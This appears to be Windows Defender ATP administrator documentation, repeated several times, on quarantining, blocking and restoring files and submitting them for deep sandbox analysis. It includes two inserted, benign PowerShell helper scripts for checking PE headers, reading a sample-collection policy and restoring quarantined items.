The Stop and Quarantine File action includes stopping running processes, quarantining the files, and deleting
persistency such as registry keys.
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the last
30 days.

NOTE
You’ll be able to restore the file from quarantine at any time.

Stop and quarantine files


1. Select the file you want to stop and quarantine. You can select a file from any of the following views or use
the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Stop and Quarantine File.
3. Specify a reason, then click Yes, stop and quarantine.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Success - Shows the number of machines where the file has been stopped and quarantined.
Failed - Shows the number of machines where the action failed and details about the failure.
Pending - Shows the number of machines where the file is yet to be stopped and quarantined from. This
can take time for cases when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed to
see where the action failed.
Notification on machine user:
When the file is being removed from a machine, the following notification is shown:

In the machine timeline, a new event is added for each machine where a file was stopped and quarantined.

IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third–party publishers to prevent the removal
of critical system files and files used by important applications.
For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from quarantine


You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation. Run
the following command on each machine where the file was quarantined.
1. Open an elevated command–line prompt on the machine:
a. Go to Start and type cmd.
b. Right–click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

“%ProgramFiles%\Windows Defender\MpCmdRun.exe” –Restore –Name EUS:Win32/CustomEnterpriseBlock –All

NOTE
Windows Defender ATP will restore all files that were quarantined on this machine in the last 30 days.

Block files in your network


You can prevent further propagation of an attack in your organization by banning potentially malicious files or
suspected malware. If you know a potentially malicious portable executable (PE ) file, you can block it. This
operation will prevent it from being read, written, or executed on machines in your organization.

IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud–based protection is enabled. For
more information, see Manage cloud–based protection.
The Antimalware client version must be 4.18.1901.x or later.
This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the
web. It currently supports portable executable (PE) files, including .exe and .dll files. The coverage will be extended over
time.
This response action is available for machines on Windows 10, version 1703 or later.
The allow or block function cannot be done on files if the file's classification exists on the device's cache prior to the allow or
block action.
NOTE
The PE file needs to be in the machine timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.

Enable the block file feature


Before you can block files, you'll need to enable the feature.
1. In the navigation pane, select Settings > Advanced features > Block file.
2. Toggle the setting between On and Off and select Save preferences.

Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Block.

3. Specify a reason and select Yes, block file to take action on the file.
The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Submitting user - Shows who submitted the action on the file. You can view the comments provided by
the user by selecting the information icon.
Status - Indicates whether the file was added to or removed from the blacklist.
When the file is blocked, there will be a new event in the machine timeline.

NOTE
-If a file was scanned before the action was taken, it may take longer to be effective on the device.

Notification on machine user:


When a file is being blocked on the machine, the following notification is displayed to inform the user that the file
was blocked:

NOTE
The Action button is turned off for files signed by Microsoft to prevent negative impact on machines in your organization
caused by the removal of files that might be related to the operating system.

For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from blocked list


1. Select the file you want to remove from the blocked list. You can select a file from any of the following views
or use the Search box:
Alerts - Click the file links from the Description or Details in the Artifact timeline
Search box - Select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Remove file from blocked list.

3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the organization.
Check activity details in Action center
The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
details on the last action that were taken on a file such as stopped and quarantined files or blocked files.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files that
are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To enrich
the data related to the file, you can submit the file for deep analysis.
The deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications,
and communication with IPs. Deep analysis currently supports extensive analysis of portable executable (PE ) files
(including .exe and .dll files).
Deep analysis of a file takes several minutes. When the file analysis is complete, results are made available in the
File view page, under a new Deep analysis summary section. The summary includes a list of observed behaviors,
some of which can indicate malicious activity, and observables, including contacted IPs and files created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate alerts.
Submit files for analysis
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or for
any other reason where you suspect malicious behavior. This feature is available in the context of the file view.
In the file's page, Submit for deep analysis is enabled when the file is available in the Windows Defender ATP
backend sample collection or if it was observed on a Windows 10 machine that supports submitting to deep
analysis.

NOTE
Only files from Windows 10 can be automatically collected.

You can also manually submit a sample through the Malware Protection Center Portal if the file was not observed
on a Windows 10 machine, and wait for Submit for deep analysis button to become available.

NOTE
Due to backend processing flows in the Malware Protection Center Portal, there could be up to 10 minutes of latency
between file submission and availability of the deep analysis feature in Windows Defender ATP.

When the sample is collected, Windows Defender ATP runs the file in is a secure environment and creates a
detailed report of observed behaviors and associated artifacts, such as files dropped on machines, communication
to IPs, and registry modifications.
Submit files for deep analysis:
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the following
views:
Alerts - click the file links from the Description or Details in the Artifact timeline
Machines list - click the file links from the Description or Details in the Machine in organization
section
Search box - select File from the drop–down menu and enter the file name
2. In the Deep analysis section of the file view, click Submit.

Note Only PE files are supported, including .exe and .dll files
A progress bar is displayed and provides information on the different stages of the analysis. You can then view the
report when the analysis is done.

NOTE
Depending on machine availability, sample collection time can vary. There is a 3–hour timeout for sample collection. The
collection will fail and the operation will abort if there is no online Windows 10 machine reporting at that time. You can re–
submit files for deep analysis to get fresh data on the file.

View deep analysis reports


View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that was
conducted on the file you submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential attack.
1. Select the file you submitted for deep analysis.
2. Click See the report below. Information on the analysis is displayed.

Troubleshoot deep analysis


If you encounter a problem when trying to submit a file, try each of the following troubleshooting steps.
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs or
applications).
2. Ensure the service has access to the file, that it still exists, and has not been corrupted or modified.
3. You can wait a short while and try to submit the file again, in case the queue is full or there was a temporary
connection or communication error.
4. If the sample collection policy is not configured, then the default behavior is to allow sample collection. If it is
configured, then verify the policy setting allows sample collection before submitting the file again. When
sample collection is configured, then check the following registry value:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value:
Value = 0 - block sample collection
Value = 1 - allow sample collection

5. Change the organizational unit through the Group Policy. For more information, see Configure with Group
Policy.
6. If these steps do not resolve the issue, contact winatp@microsoft.com.
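As an added example (not from the Windows Defender ATP documentation), the following PowerShell script automates troubleshooting steps 1 and 4 above: it verifies that the candidate file really is a PE file by inspecting its header rather than trusting the extension, and it reads the AllowSampleCollection policy value from the registry path listed in step 4, treating an absent value as "not configured" (sample collection allowed by default). The function names and the placeholder sample path are this example's own assumptions; the registry path and value name come from the documentation.

```powershell
# Added example, not part of the Windows Defender ATP documentation.
# Pre-flight checks before submitting a file for deep analysis.

function Test-PeFile {
    param([Parameter(Mandatory)][string]$Path)
    # Deep analysis only accepts PE files. Check the header instead of the
    # extension: "MZ" at offset 0, then "PE\0\0" at the offset stored in the
    # 4-byte e_lfanew field at 0x3C.
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    $fs = [System.IO.File]::OpenRead($Path)
    try {
        $hdr = New-Object byte[] 0x40
        if ($fs.Read($hdr, 0, 0x40) -ne 0x40) { return $false }     # too short for a DOS header
        if ($hdr[0] -ne 0x4D -or $hdr[1] -ne 0x5A) { return $false } # not 'MZ'
        $peOffset = [System.BitConverter]::ToUInt32($hdr, 0x3C)
        if ($peOffset + 4 -gt $fs.Length) { return $false }         # e_lfanew points past EOF
        $fs.Seek($peOffset, [System.IO.SeekOrigin]::Begin) | Out-Null
        $sig = New-Object byte[] 4
        if ($fs.Read($sig, 0, 4) -ne 4) { return $false }
        return ($sig[0] -eq 0x50 -and $sig[1] -eq 0x45 -and $sig[2] -eq 0 -and $sig[3] -eq 0)
    }
    finally { $fs.Dispose() }
}

function Get-SampleCollectionPolicy {
    # Registry path and value name as given in troubleshooting step 4.
    $key  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    $name = 'AllowSampleCollection'
    $item = Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue
    # Absent key or value means the policy is not configured: collection is allowed by default.
    if ($null -eq $item) { return 'NotConfigured (sample collection allowed by default)' }
    switch ($item.$name) {
        0       { return 'Configured: sample collection blocked (0)' }
        1       { return 'Configured: sample collection allowed (1)' }
        default { return "Configured: unexpected value $($item.$name)" }
    }
}

# Usage: point at the file you intend to submit (placeholder path, this example's own).
$sample = 'C:\Temp\suspect.exe'
"PE header check : $(Test-PeFile -Path $sample)"
"Sample policy   : $(Get-SampleCollectionPolicy)"
```

If the header check returns False, the submission will be rejected regardless of the extension, so rename or re-collect the sample before retrying; if the policy reads as blocked, fix the Group Policy setting (step 5) before resubmitting.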

Related topic
Take response actions on a machine
Take response actions on a file
4/19/2019 • 10 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files,
you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.

You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is complete,
you'll get a detailed report that provides information about the behavior of the file.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and quarantining the file where it
was observed.

IMPORTANT
You can only take this action if:
The machine you're taking the action on is running Windows 10, version 1703 or later
The file is not signed by Microsoft and does not belong to a trusted third-party publisher
Windows Defender Antivirus must at least be running in Passive mode. For more information, see Windows Defender
Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining the files, and deleting
persistence mechanisms such as registry keys.
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the last
30 days.

NOTE
You’ll be able to restore the file from quarantine at any time.

Stop and quarantine files


1. Select the file you want to stop and quarantine. You can select a file from any of the following views or use
the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Stop and Quarantine File.
3. Specify a reason, then click Yes, stop and quarantine.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Success - Shows the number of machines where the file has been stopped and quarantined.
Failed - Shows the number of machines where the action failed and details about the failure.
Pending - Shows the number of machines on which the file has not yet been stopped and quarantined. This
can take time when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed to
see where the action failed.
Notification on machine user:
When the file is being removed from a machine, the following notification is shown:

In the machine timeline, a new event is added for each machine where a file was stopped and quarantined.

IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third-party publishers to prevent the removal
of critical system files and files used by important applications.
For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from quarantine


You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation. Run
the following command on each machine where the file was quarantined.
1. Open an elevated command-line prompt on the machine:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -Restore -Name EUS:Win32/CustomEnterpriseBlock -All

NOTE
Windows Defender ATP will restore all files that were quarantined on this machine in the last 30 days.
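As an added example that is not part of the original documentation, this PowerShell wrapper around the restore command above first lists what is currently in quarantine (MpCmdRun.exe accepts -Restore -ListAll for that) so the operator can confirm which items will come back before restoring everything under the EUS:Win32/CustomEnterpriseBlock name, then runs the restore and checks the exit code. The function name and the -ListOnly switch are this example's own; the MpCmdRun.exe switches are the tool's real ones.

```powershell
# Added example, not part of the Windows Defender ATP documentation.
# Run from an elevated PowerShell session on the machine where the file was quarantined.

$MpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'

function Restore-AtpQuarantine {
    param(
        # Threat name under which Windows Defender ATP quarantines files (from the docs).
        [string]$ThreatName = 'EUS:Win32/CustomEnterpriseBlock',
        # Only list quarantined items; do not restore anything.
        [switch]$ListOnly
    )
    if (-not (Test-Path -LiteralPath $MpCmdRun)) {
        throw "MpCmdRun.exe not found at $MpCmdRun"
    }

    # Show what is in quarantine so the restore is a deliberate, reviewed choice:
    # the -All switch restores every item quarantined under that name in the last 30 days.
    Write-Host "Quarantined items on $($env:COMPUTERNAME):"
    & $MpCmdRun -Restore -ListAll
    if ($ListOnly) { return }

    & $MpCmdRun -Restore -Name $ThreatName -All
    if ($LASTEXITCODE -ne 0) {
        throw "Restore failed with exit code $LASTEXITCODE"
    }
    Write-Host "Restored all '$ThreatName' items quarantined in the last 30 days."
}

# Usage: inspect first, then restore once you are satisfied the file is clean.
Restore-AtpQuarantine -ListOnly
# Restore-AtpQuarantine
```

Because the restore is per machine, run the function on each machine the Action center listed under Success for the original Stop and Quarantine action.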

Block files in your network


You can prevent further propagation of an attack in your organization by banning potentially malicious files or
suspected malware. If you know a potentially malicious portable executable (PE) file, you can block it. This
operation will prevent it from being read, written, or executed on machines in your organization.

IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud-based protection is enabled. For
more information, see Manage cloud-based protection.
The Antimalware client version must be 4.18.1901.x or later.
This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the
web. It currently supports portable executable (PE) files, including .exe and .dll files. The coverage will be extended over
time.
This response action is available for machines on Windows 10, version 1703 or later.
The allow or block action cannot be applied to a file whose classification was already present in the device's cache before
the action was taken.

NOTE
The PE file needs to be in the machine timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.

Enable the block file feature


Before you can block files, you'll need to enable the feature.
1. In the navigation pane, select Settings > Advanced features > Block file.
2. Toggle the setting between On and Off and select Save preferences.

Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Block.

3. Specify a reason and select Yes, block file to take action on the file.
The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Submitting user - Shows who submitted the action on the file. You can view the comments provided by
the user by selecting the information icon.
Status - Indicates whether the file was added to or removed from the blocked list.
When the file is blocked, there will be a new event in the machine timeline.

NOTE
If a file was scanned before the action was taken, it may take longer for the block to become effective on the device.

Notification on machine user:


When a file is being blocked on the machine, the following notification is displayed to inform the user that the file
was blocked:

NOTE
The Action button is turned off for files signed by Microsoft to prevent negative impact on machines in your organization
caused by the removal of files that might be related to the operating system.

For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from blocked list


1. Select the file you want to remove from the blocked list. You can select a file from any of the following views
or use the Search box:
Alerts - Click the file links from the Description or Details in the Artifact timeline
Search box - Select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Remove file from blocked list.

3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the organization.
Check activity details in Action center
The Action center provides information on actions that were taken on a machine or file. You'll be able to view the
details of the last action that was taken on a file, such as stopping and quarantining it or blocking it.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files that
are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To enrich
the data related to the file, you can submit the file for deep analysis.
The deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications,
and communication with IPs. Deep analysis currently supports extensive analysis of portable executable (PE) files
(including .exe and .dll files).
Deep analysis of a file takes several minutes. When the file analysis is complete, results are made available in the
File view page, under a new Deep analysis summary section. The summary includes a list of observed behaviors,
some of which can indicate malicious activity, and observables, including contacted IPs and files created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate alerts.
Submit files for analysis
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or for
any other reason where you suspect malicious behavior. This feature is available in the context of the file view.
In the file's page, Submit for deep analysis is enabled when the file is available in the Windows Defender ATP
backend sample collection or if it was observed on a Windows 10 machine that supports submitting to deep
analysis.

NOTE
Only files from Windows 10 can be automatically collected.

You can also manually submit a sample through the Malware Protection Center Portal if the file was not observed
on a Windows 10 machine, and wait for Submit for deep analysis button to become available.

NOTE
Due to backend processing flows in the Malware Protection Center Portal, there could be up to 10 minutes of latency
between file submission and availability of the deep analysis feature in Windows Defender ATP.

When the sample is collected, Windows Defender ATP runs the file in is a secure environment and creates a
detailed report of observed behaviors and associated artifacts, such as files dropped on machines, communication
to IPs, and registry modifications.
Submit files for deep analysis:
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the following
views:
Alerts - click the file links from the Description or Details in the Artifact timeline
Machines list - click the file links from the Description or Details in the Machine in organization
section
Search box - select File from the drop–down menu and enter the file name
2. In the Deep analysis section of the file view, click Submit.

Note Only PE files are supported, including .exe and .dll files
A progress bar is displayed and provides information on the different stages of the analysis. You can then view the
report when the analysis is done.

NOTE
Depending on machine availability, sample collection time can vary. There is a 3–hour timeout for sample collection. The
collection will fail and the operation will abort if there is no online Windows 10 machine reporting at that time. You can re–
submit files for deep analysis to get fresh data on the file.

View deep analysis reports


View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that was
conducted on the file you submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential attack.
1. Select the file you submitted for deep analysis.
2. Click See the report below. Information on the analysis is displayed.

Troubleshoot deep analysis


If you encounter a problem when trying to submit a file, try each of the following troubleshooting steps.
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs or
applications).
2. Ensure the service has access to the file, that it still exists, and has not been corrupted or modified.
3. You can wait a short while and try to submit the file again, in case the queue is full or there was a temporary
connection or communication error.
4. If the sample collection policy is not configured, then the default behavior is to allow sample collection. If it is
configured, then verify the policy setting allows sample collection before submitting the file again. When
sample collection is configured, then check the following registry value:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value :
Value = 0 – block sample collection
Value = 1 – allow sample collection

5. Change the organizational unit through the Group Policy. For more information, see Configure with Group
Policy.
6. If these steps do not resolve the issue, contact winatp@microsoft.com.

Related topic
Take response actions on a machine
Take response actions on a file
4/19/2019 • 10 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files,
you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.

You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is complete,
you'll get a detailed report that provides information about the behavior of the file.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and quarantine the file where it
was observed.

IMPORTANT
You can only take this action if:
The machine you're taking the action on is running Windows 10, version 1703 or later
The file does not belong to trusted third-party publishers or not signed by Microsoft
Windows Defender Antivirus must at least be running on Passive mode. For more information, see Windows Defender
Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining the files, and deleting
persistency such as registry keys.
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the last
30 days.

NOTE
You’ll be able to restore the file from quarantine at any time.

Stop and quarantine files


1. Select the file you want to stop and quarantine. You can select a file from any of the following views or use
the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Stop and Quarantine File.
3. Specify a reason, then click Yes, stop and quarantine.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Success - Shows the number of machines where the file has been stopped and quarantined.
Failed - Shows the number of machines where the action failed and details about the failure.
Pending - Shows the number of machines where the file is yet to be stopped and quarantined from. This
can take time for cases when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed to
see where the action failed.
Notification on machine user:
When the file is being removed from a machine, the following notification is shown:

In the machine timeline, a new event is added for each machine where a file was stopped and quarantined.

IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third–party publishers to prevent the removal
of critical system files and files used by important applications.
For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from quarantine


You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation. Run
the following command on each machine where the file was quarantined.
1. Open an elevated command–line prompt on the machine:
a. Go to Start and type cmd.
b. Right–click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

“%ProgramFiles%\Windows Defender\MpCmdRun.exe” –Restore –Name EUS:Win32/CustomEnterpriseBlock –All

NOTE
Windows Defender ATP will restore all files that were quarantined on this machine in the last 30 days.

Block files in your network


You can prevent further propagation of an attack in your organization by banning potentially malicious files or
suspected malware. If you know a potentially malicious portable executable (PE ) file, you can block it. This
operation will prevent it from being read, written, or executed on machines in your organization.

IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud–based protection is enabled. For
more information, see Manage cloud–based protection.
The Antimalware client version must be 4.18.1901.x or later.
This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the
web. It currently supports portable executable (PE) files, including .exe and .dll files. The coverage will be extended over
time.
This response action is available for machines on Windows 10, version 1703 or later.
The allow or block function cannot be done on files if the file's classification exists on the device's cache prior to the allow or
block action.
NOTE
The PE file needs to be in the machine timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.

Enable the block file feature


Before you can block files, you'll need to enable the feature.
1. In the navigation pane, select Settings > Advanced features > Block file.
2. Toggle the setting between On and Off and select Save preferences.

Block a file
1. Select the file you want to block. You can select a file from any of the following views or use the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Block.

3. Specify a reason and select Yes, block file to take action on the file.
The Action center shows the submission information:

Submission time - Shows when the action was submitted.


Submitting user - Shows who submitted the action on the file. You can view the comments provided by
the user by selecting the information icon.
Status - Indicates whether the file was added to or removed from the blacklist.
When the file is blocked, there will be a new event in the machine timeline.

NOTE
-If a file was scanned before the action was taken, it may take longer to be effective on the device.

Notification on machine user:


When a file is being blocked on the machine, the following notification is displayed to inform the user that the file
was blocked:

NOTE
The Action button is turned off for files signed by Microsoft to prevent negative impact on machines in your organization
caused by the removal of files that might be related to the operating system.

For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from blocked list


1. Select the file you want to remove from the blocked list. You can select a file from any of the following views
or use the Search box:
Alerts - Click the file links from the Description or Details in the Artifact timeline
Search box - Select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Remove file from blocked list.

3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the organization.
Check activity details in Action center
The Action center provides information on actions that were taken on a machine or file. You’ll be able to view the
details on the last action that were taken on a file such as stopped and quarantined files or blocked files.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files that
are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To enrich
the data related to the file, you can submit the file for deep analysis.
The deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications,
and communication with IPs. Deep analysis currently supports extensive analysis of portable executable (PE ) files
(including .exe and .dll files).
Deep analysis of a file takes several minutes. When the file analysis is complete, results are made available in the
File view page, under a new Deep analysis summary section. The summary includes a list of observed behaviors,
some of which can indicate malicious activity, and observables, including contacted IPs and files created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate alerts.
Submit files for analysis
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or for
any other reason where you suspect malicious behavior. This feature is available in the context of the file view.
In the file's page, Submit for deep analysis is enabled when the file is available in the Windows Defender ATP
backend sample collection or if it was observed on a Windows 10 machine that supports submitting to deep
analysis.

NOTE
Only files from Windows 10 can be automatically collected.

You can also manually submit a sample through the Malware Protection Center Portal if the file was not observed
on a Windows 10 machine, and wait for Submit for deep analysis button to become available.

NOTE
Due to backend processing flows in the Malware Protection Center Portal, there could be up to 10 minutes of latency
between file submission and availability of the deep analysis feature in Windows Defender ATP.

When the sample is collected, Windows Defender ATP runs the file in is a secure environment and creates a
detailed report of observed behaviors and associated artifacts, such as files dropped on machines, communication
to IPs, and registry modifications.
Submit files for deep analysis:
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the following
views:
Alerts - click the file links from the Description or Details in the Artifact timeline
Machines list - click the file links from the Description or Details in the Machine in organization
section
Search box - select File from the drop–down menu and enter the file name
2. In the Deep analysis section of the file view, click Submit.

Note Only PE files are supported, including .exe and .dll files
A progress bar is displayed and provides information on the different stages of the analysis. You can then view the
report when the analysis is done.

NOTE
Depending on machine availability, sample collection time can vary. There is a 3–hour timeout for sample collection. The
collection will fail and the operation will abort if there is no online Windows 10 machine reporting at that time. You can re–
submit files for deep analysis to get fresh data on the file.

View deep analysis reports


View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that was
conducted on the file you submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential attack.
1. Select the file you submitted for deep analysis.
2. Click See the report below. Information on the analysis is displayed.

Troubleshoot deep analysis


If you encounter a problem when trying to submit a file, try each of the following troubleshooting steps.
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs or
applications).
2. Ensure the service has access to the file, that it still exists, and has not been corrupted or modified.
3. You can wait a short while and try to submit the file again, in case the queue is full or there was a temporary
connection or communication error.
4. If the sample collection policy is not configured, then the default behavior is to allow sample collection. If it is
configured, then verify the policy setting allows sample collection before submitting the file again. When
sample collection is configured, then check the following registry value:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value :
Value = 0 – block sample collection
Value = 1 – allow sample collection

5. Change the organizational unit through the Group Policy. For more information, see Configure with Group
Policy.
6. If these steps do not resolve the issue, contact winatp@microsoft.com.

Related topic
Take response actions on a machine
Take response actions on a file
4/19/2019 • 10 minutes to read • Edit Online

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP )

Want to experience Windows Defender ATP? Sign up for a free trial.

Quickly respond to detected attacks by stopping and quarantining files or blocking a file. After taking action on files,
you can check activity details on the Action center.

IMPORTANT
These response actions are only available for machines on Windows 10, version 1703 or later.

You can also submit files for deep analysis to run the file in a secure cloud sandbox. When the analysis is complete,
you'll get a detailed report that provides information about the behavior of the file.

Stop and quarantine files in your network


You can contain an attack in your organization by stopping the malicious process and quarantine the file where it
was observed.

IMPORTANT
You can only take this action if:
The machine you're taking the action on is running Windows 10, version 1703 or later
The file does not belong to trusted third-party publishers or not signed by Microsoft
Windows Defender Antivirus must at least be running on Passive mode. For more information, see Windows Defender
Antivirus compatibility.

The Stop and Quarantine File action includes stopping running processes, quarantining the files, and deleting
persistency such as registry keys.
The action takes effect on machines with Windows 10, version 1703 or later, where the file was observed in the last
30 days.

NOTE
You’ll be able to restore the file from quarantine at any time.

Stop and quarantine files


1. Select the file you want to stop and quarantine. You can select a file from any of the following views or use
the Search box:
Alerts - click the corresponding links from the Description or Details in the Artifact timeline
Search box - select File from the drop–down menu and enter the file name
2. Open the Actions menu and select Stop and Quarantine File.
3. Specify a reason, then click Yes, stop and quarantine.

The Action center shows the submission information:


Submission time - Shows when the action was submitted.
Success - Shows the number of machines where the file has been stopped and quarantined.
Failed - Shows the number of machines where the action failed and details about the failure.
Pending - Shows the number of machines where the file is yet to be stopped and quarantined from. This
can take time for cases when the machine is offline or not connected to the network.
4. Select any of the status indicators to view more information about the action. For example, select Failed to
see where the action failed.
Notification on machine user:
When the file is being removed from a machine, the following notification is shown:

In the machine timeline, a new event is added for each machine where a file was stopped and quarantined.

IMPORTANT
The Action button is turned off for files signed by Microsoft as well as trusted third–party publishers to prevent the removal
of critical system files and files used by important applications.
For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from quarantine


You can roll back and remove a file from quarantine if you’ve determined that it’s clean after an investigation. Run
the following command on each machine where the file was quarantined.
1. Open an elevated command–line prompt on the machine:
a. Go to Start and type cmd.
b. Right–click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

“%ProgramFiles%\Windows Defender\MpCmdRun.exe” –Restore –Name EUS:Win32/CustomEnterpriseBlock –All

NOTE
Windows Defender ATP will restore all files that were quarantined on this machine in the last 30 days.

Block files in your network


You can prevent further propagation of an attack in your organization by banning potentially malicious files or
suspected malware. If you know a potentially malicious portable executable (PE ) file, you can block it. This
operation will prevent it from being read, written, or executed on machines in your organization.

IMPORTANT
This feature is available if your organization uses Windows Defender Antivirus and Cloud–based protection is enabled. For
more information, see Manage cloud–based protection.
The Antimalware client version must be 4.18.1901.x or later.
This feature is designed to prevent suspected malware (or potentially malicious files) from being downloaded from the
web. It currently supports portable executable (PE) files, including .exe and .dll files. The coverage will be extended over
time.
This response action is available for machines on Windows 10, version 1703 or later.
The allow or block action cannot be applied to a file whose classification was already present in the device's cache before
the allow or block action was taken.
NOTE
The PE file needs to be in the machine timeline for you to be able to take this action.
There may be a couple of minutes of latency between the time the action is taken and the actual file being blocked.

Enable the block file feature


